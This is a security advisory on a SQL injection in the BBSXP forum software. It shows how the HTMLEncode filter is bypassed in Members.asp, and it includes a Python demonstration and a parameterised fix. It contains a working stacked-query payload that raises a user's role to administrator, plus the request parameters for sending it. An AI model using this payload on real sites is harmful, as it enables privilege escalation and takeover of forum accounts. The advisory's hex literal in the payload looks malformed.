BBSXP HTMLEncode filter bypass SQL injection vulnerability

Affected versions:

BBSXP 7.3 through BBSXP2008 (SQL Server edition)

Description:

BBSXP is a simple ASP forum with a SQL Server or Access back end; the current latest version is BBSXP2008.
The vendor updated the filter function HTMLEncode, but it only entity-encodes a handful of characters (quotes, *, commas, --, ; and the like). Parentheses, square brackets, the equals sign, letters and digits pass through untouched, so a stacked query can still be built and the filter bypassed for injection.
Function HTMLEncode(fString)
fString=Replace(fString,CHR(9),"")
fString=Replace(fString,CHR(13),"")
fString=Replace(fString,CHR(22),"")
fString=Replace(fString,CHR(38),"&amp;") '&
fString=Replace(fString,CHR(32),"&nbsp;") 'space
fString=Replace(fString,CHR(34),"&quot;") '"
fString=Replace(fString,CHR(39),"&#39;") ''
fString=Replace(fString,CHR(42),"&#42;") '*
fString=Replace(fString,CHR(44),"&#44;") ',
fString=Replace(fString,CHR(45)&CHR(45),"&#45;&#45;") '--
fString=Replace(fString,CHR(60),"&lt;") '<
fString=Replace(fString,CHR(62),"&gt;") '>
fString=Replace(fString,CHR(92),"&#92;") '\
fString=Replace(fString,CHR(59),"&#59;") ';
fString=Replace(fString,CHR(10),"<br>")
fString=ReplaceText(fString,"([&#])([a-z0-9]*)&#59;","$1$2;") 'restore the ; of the entities inserted above, which the CHR(59) replace just mangled
if SiteConfig("BannedText")<>"" then fString=ReplaceText(fString,"("&SiteConfig("BannedText")&")",string(len("&$1&"),"*"))
if IsSqlDataBase=0 then 'Access back end only: katakana (Japanese characters) [\u30A0-\u30FF], by yuzi
fString=escape(fString)
fString=ReplaceText(fString,"%u30([A-F][0-F])","&#x30$1;")
fString=unescape(fString)
end if
HTMLEncode=fString
End Function
The vulnerable code in Members.asp:
SearchType=HTMLEncode(Request("SearchType")) ' Members.asp line 8
SearchText=HTMLEncode(Request("SearchText"))
SearchRole=RequestInt("SearchRole")
CurrentAccountStatus=HTMLEncode(Request("CurrentAccountStatus")) ' passed through HTMLEncode only, not RequestInt

if SearchText<>"" then item=item&" and ("&SearchType&" like '%"&SearchText&"%')" ' line 18: SearchType is spliced in as a bare column name

if CurrentAccountStatus <> "" then item=item&" and UserAccountStatus="&CurrentAccountStatus&"" ' line 22: unquoted numeric concatenation, the injection point

if item<>"" then item=" where "&mid(item,5)

TotalCount=Execute("Select count(UserID) From ["&TablePrefix&"Users]"&item)(0) ' line 54: get the total count

The resulting SQL statement:
select * from bbsxp_users where userid=(1)update[bbsxp_users]set[userroleid]=(1)where(username=079006C003600330036003400)
The parenthesised value after userid passes HTMLEncode unchanged (no space, quote, comma or semicolon is needed: brackets separate the keywords and username is compared against a hexadecimal literal), and the stacked update executes successfully.
Members.asp is exploited the same way:
SearchType=1
SearchText=1
CurrentAccountStatus=(1)update[bbsxp_users]set[userroleid]=(1)where(username=079006C003600330036003400)
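To make the bypass concrete, the following is an added example (not BBSXP code and not from the original advisory): a Python port of the HTMLEncode replace chain reproduced above, the Members.asp string concatenation, and a hardened rewrite of that concatenation. It assumes a SQL Server back end with the default table prefix bbsxp_, omits the BannedText and Access-only katakana branches (neither touches the characters the payload needs), uses the hypothetical column names UserName and UserEmail for the whitelist, and closes the injected update with where(userid=(2)) so the demonstration does not depend on the hex literal in the advisory's payload.

```python
import re

# Port of the HTMLEncode Replace() chain from the advisory, applied in the
# same order. BannedText and katakana handling are omitted (assumption:
# SQL Server back end, no banned-word list configured).
_REPLACEMENTS = [
    ("\t", ""), ("\r", ""), ("\x16", ""),
    ("&", "&amp;"), (" ", "&nbsp;"), ('"', "&quot;"), ("'", "&#39;"),
    ("*", "&#42;"), (",", "&#44;"), ("--", "&#45;&#45;"),
    ("<", "&lt;"), (">", "&gt;"), ("\\", "&#92;"), (";", "&#59;"),
    ("\n", "<br>"),
]
# ReplaceText(fString,"([&#])([a-z0-9]*)&#59;","$1$2;"): the CHR(59) replace
# above also hit the ';' of the entities inserted before it; this puts them back.
_FIX_ENTITY_RE = re.compile(r"([&#])([a-z0-9]*)&#59;")


def html_encode(s: str) -> str:
    for old, new in _REPLACEMENTS:
        s = s.replace(old, new)
    return _FIX_ENTITY_RE.sub(r"\1\2;", s)


def survives_filter(payload: str) -> bool:
    """True when HTMLEncode hands the payload to the SQL string unchanged."""
    return html_encode(payload) == payload


# Constructed payload in the shape the advisory shows: (1) satisfies the
# numeric comparison, then a second statement follows. Brackets stand in for
# spaces, so no space, quote, comma or semicolon is needed.
PAYLOAD = "(1)update[bbsxp_users]set[userroleid]=(1)where(userid=(2))"


def build_members_query(search_type, search_text, current_account_status,
                        table_prefix="bbsxp_"):
    """String concatenation as Members.asp does it, after HTMLEncode."""
    search_type = html_encode(search_type)
    search_text = html_encode(search_text)
    current_account_status = html_encode(current_account_status)
    item = ""
    if search_text != "":
        item += " and (" + search_type + " like '%" + search_text + "%')"
    if current_account_status != "":
        item += " and UserAccountStatus=" + current_account_status
    if item != "":
        item = " where " + item[4:]  # mid(item,5): drop the leading " and"
    return "Select count(UserID) From [" + table_prefix + "Users]" + item


# Hardened rewrite (a suggestion, not vendor code). SearchType names a column,
# so it must come from a whitelist; the values become bind parameters and
# the status must parse as an integer. Column names are assumed.
ALLOWED_SEARCH_COLUMNS = {"UserName", "UserEmail"}


def build_members_query_safe(search_type, search_text, current_account_status,
                             table_prefix="bbsxp_"):
    clauses, params = [], []
    if search_text != "":
        if search_type not in ALLOWED_SEARCH_COLUMNS:
            raise ValueError("SearchType is not a searchable column")
        clauses.append("[" + search_type + "] like ?")
        params.append("%" + search_text + "%")
    if current_account_status != "":
        # int() raises ValueError for "(1)update[...]", so the payload never
        # reaches the query text; the real value travels as a parameter.
        clauses.append("UserAccountStatus=?")
        params.append(int(current_account_status))
    sql = "Select count(UserID) From [" + table_prefix + "Users]"
    if clauses:
        sql += " where " + " and ".join(clauses)
    return sql, params


if __name__ == "__main__":
    print("filter bypassed:", survives_filter(PAYLOAD))
    print(build_members_query("1", "1", PAYLOAD))
    try:
        build_members_query_safe("1", "1", PAYLOAD)
    except ValueError as exc:
        print("hardened version rejected the request:", exc)
```

Running the block prints the exact statement Members.asp would hand to Execute(), with the update statement intact after UserAccountStatus=, and then shows the hardened builder refusing the same request. The point of the hardened version is that HTMLEncode is an output-encoding routine for HTML and was never a SQL defence: the column name is validated against a fixed set and every value is bound, so which characters the encoder happens to touch no longer matters.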
<* Reference:
 Bug.Center.Team
 *>